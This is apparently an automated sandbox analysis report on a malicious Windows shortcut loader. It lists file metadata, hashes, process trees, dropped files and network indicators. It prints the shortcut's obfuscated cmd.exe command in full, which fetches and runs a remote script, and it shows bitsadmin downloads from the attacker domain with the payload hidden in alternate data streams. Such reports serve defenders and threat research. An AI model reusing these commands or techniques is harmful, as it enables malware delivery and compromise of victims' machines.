Field | Value
---|---
File name | Arquivo514_04_10_2019.lnk
Full analysis | https://app.any.run/tasks/a5434c8c-cb8a-4f17-80f1-9fbe8c39855d
Verdict | Malicious activity
Threats | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims' computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links, relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.
Analysis date | October 09, 2019, 15:28:27
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags |
Indicators |
MIME | application/octet-stream
File info | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=18, Archive, ctime=Sun Nov 21 02:24:03 2010, mtime=Sun Nov 21 02:24:03 2010, atime=Sun Nov 21 02:24:03 2010, length=302592, window=hidenormalshowminimized
MD5 | FAC12693F40F950710681EB125E1058C
SHA1 | 223E49D34DCB8366046181E308150BC54F9B3788
SHA256 | E925B17F09C667D4FEBEE88FEBA066C2DD80AE4148DB7B65968BC79C62FAF0A0
SSDEEP | 24:8aS37Dpd9Q2CzA6Y+/qiCwBIDnQgRY0j6XZUN84o0w5vZ4O1BrTI:8aSrD3n0VBu0Qo/x4OX0
Extension | Type
---|---
.lnk | Windows Shortcut (100)
LNK field | Value
---|---
MachineID | jumper-pc
IconFileName | %SystemRoot%\system32\imageres.dll
CommandLineArguments | `/V /D /c "sEt SRM=%wYDIIindYDIIir%YDII\eYDIIXPYDIILoRYDIIeRYDII /cYDII,&&Set RZE=GeJDCWtOJDCWbjJDCWecJDCWt(JDCW'sJDCWcriJDCWpt:JDCWhttJDCWps:JDCW&&SEt hx76c22=KVIKVIroadsshare.cfKVI?07KVI') 2>&1 && sET/^p qstKftH="%RZE:JDCW=%%hx76c22:KVI=/%" <nul > %UserPROfile%\m7Ye4i4.Js 2>&1 2>&1\|call %SRM:YDII=% %UserProfile%\m7Ye4i4.jS 2>&1\|e^xi^T"`
RelativePath | .\Windows\System32\cmd.exe
Description | gfjc
LocalBasePath | C:\Windows\System32\cmd.exe
VolumeLabel | -
DriveType | Fixed Disk
TargetFileDOSName | cmd.exe
HotKey | (none)
RunWindow | Show Minimized No Activate
IconIndex | 18
TargetFileSize | 302592
ModifyDate | 2010:11:21 04:24:03+01:00
AccessDate | 2010:11:21 04:24:03+01:00
CreateDate | 2010:11:21 04:24:03+01:00
FileAttributes | Archive
Flags | IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpString
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
2724 | `"C:\Windows\System32\cmd.exe" /V /D /c "sEt SRM=%wYDIIindYDIIir%YDII\eYDIIXPYDIILoRYDIIeRYDII /cYDII,&&Set RZE=GeJDCWtOJDCWbjJDCWecJDCWt(JDCW'sJDCWcriJDCWpt:JDCWhttJDCWps:JDCW&&SEt hx76c22=KVIKVIroadsshare.cfKVI?07KVI') 2>&1 && sET/^p qstKftH="%RZE:JDCW=%%hx76c22:KVI=/%" <nul > C:\Users\admin\m7Ye4i4.Js 2>&1 2>&1\|call %SRM:YDII=% C:\Users\admin\m7Ye4i4.jS 2>&1\|e^xi^T"` | C:\Windows\System32\cmd.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2580 | `C:\Windows\system32\cmd.exe /S /D /c" sET/p qstKftH="%RZE:JDCW=%%hx76c22:KVI=/%" 0<nul 1>C:\Users\admin\m7Ye4i4.Js 2>&1"` | C:\Windows\system32\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3596 | `C:\Windows\system32\cmd.exe /S /D /c" call %SRM:YDII=% C:\Users\admin\m7Ye4i4.jS 2>&1"` | C:\Windows\system32\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3700 | `C:\Windows\system32\cmd.exe /S /D /c" exiT"` | C:\Windows\system32\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1452 | `C:\Windows\eXPLoReR /c, C:\Users\admin\m7Ye4i4.jS` | C:\Windows\explorer.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Explorer; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3572 | `C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding` | C:\Windows\explorer.exe | — | svchost.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Explorer; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2476 | `"C:\Windows\System32\WScript.exe" "C:\Users\admin\m7Ye4i4.Js"` | C:\Windows\System32\WScript.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 1073807364; Version: 5.8.7600.16385
2128 | `"C:\Windows\System32\bitsadmin.exe" /transfer 52298 /priority foreground https://roadsshare.tk/07/landoqeahjkya.jpg.zip C:\Users\Public\Libraries\trust\landoqeahjkya.jpg` | C:\Windows\System32\bitsadmin.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: BITS administration utility; Exit code: 0; Version: 7.5.7600.16385 (win7_rtm.090713-1255)
3472 | `"C:\Windows\System32\cmd.exe" /c type "C:\Users\Public\Libraries\trust\landoqeahjkya.jpg" > "C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkya.jpg"&&erase "C:\Users\Public\Libraries\trust\landoqeahjkya.jpg"` | C:\Windows\System32\cmd.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1404 | `"C:\Windows\System32\bitsadmin.exe" /transfer 85686 /priority foreground https://roadsshare.tk/07/landoqeahjkyb.jpg.zip C:\Users\Public\Libraries\trust\landoqeahjkyb.jpg` | C:\Windows\System32\bitsadmin.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: BITS administration utility; Exit code: 0; Version: 7.5.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2748 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkydx.gif | binary | 6EA0310A175387E161817502FA576641 | E85954435FE1FE9CB5C042BD035513111D07F3ED41DA5B8D61E3D0C1A42C7C23
2476 | WScript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\roadsshare_cf[1].txt | xml | 92A4E2E27AD2694E8D6CB5170F7DAC1B | 60FB36DEE00FDACA3FAA840863F22B12B38B25D3E52FF3548943846E8BD4F4C9
1636 | cmd.exe | C:\Users\Public\Libraries\trust\r1.log | text | DEE3DF2742A5AA5662ABF8637AC87A3A | A368E5B71B293DB268F0B2981163333874EEFD26721E13645557B83C1CBC1E76
2848 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyi.gif | binary | 176B1DC2B5059B6704E1B35E3EDCC62D | 26B0095DFF7C50AE12F165A62B4BA954520B60E54D923432213D92AD8090D412
2496 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyxa.~ | executable | D336F1B6EAAF81FDA7366C91FB050108 | 8D1AEF50A85D87063F2BD05FBD782111B14F0467FED70D8E5DFB86B6F61E6D09
3692 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyxb.~ | binary | 36F60D673EE6E65C8EEC16059B9ED634 | 17921585FADF23A31A0FFA7991878B614119A0105679FC1339AD2EFD745C35B1
3472 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkya.jpg | binary | 57BBFB7DFBD710AAEF209BFF71B08A32 | 66C9C650E26635BF9E205E0EBB7B149A69A25F002917A1F9C5360149D423B30E
2476 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@roadsshare[1].txt | text | E247EEAB9CF342F02D15883BDCB2E717 | B0A6B92EC436206029D8E81D777097E3B4A3B3C27DCE914542A1AA423E492590
2484 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkyc.jpg | binary | 731CE6815B16DA24A9B41261C9C4CB35 | 40939CAF1D074EE825A2E1943F99D50AD6258C70612FA5F345FA35170A3D1BD1
3020 | cmd.exe | C:\Users\Public\Libraries\trust\desktop.ini:landoqeahjkygx.gif | binary | 4959533361EF3FD46F430D7F8F3411CA | F42DD164EB8772BCE7B9DB81CEA30726DE4270961EFFA1EF582A0BD8539CA12B
PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---
— | — | 104.28.15.78:443 | roadsshare.tk | Cloudflare Inc | US | unknown |
2476 | WScript.exe | 104.27.131.120:443 | roadsshare.cf | Cloudflare Inc | US | shared |
2476 | WScript.exe | 104.27.130.120:443 | roadsshare.cf | Cloudflare Inc | US | shared |
Domain | IP | Reputation
---|---|---
roadsshare.cf | | suspicious
roadsshare.tk | | suspicious
PID | Process | Class | Message
---|---|---|---
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .cf Domain |
2476 | WScript.exe | Potentially Bad Traffic | ET INFO Suspicious Domain (*.cf) in TLS SNI |
— | — | Potentially Bad Traffic | ET DNS Query to a .tk domain - Likely Hostile |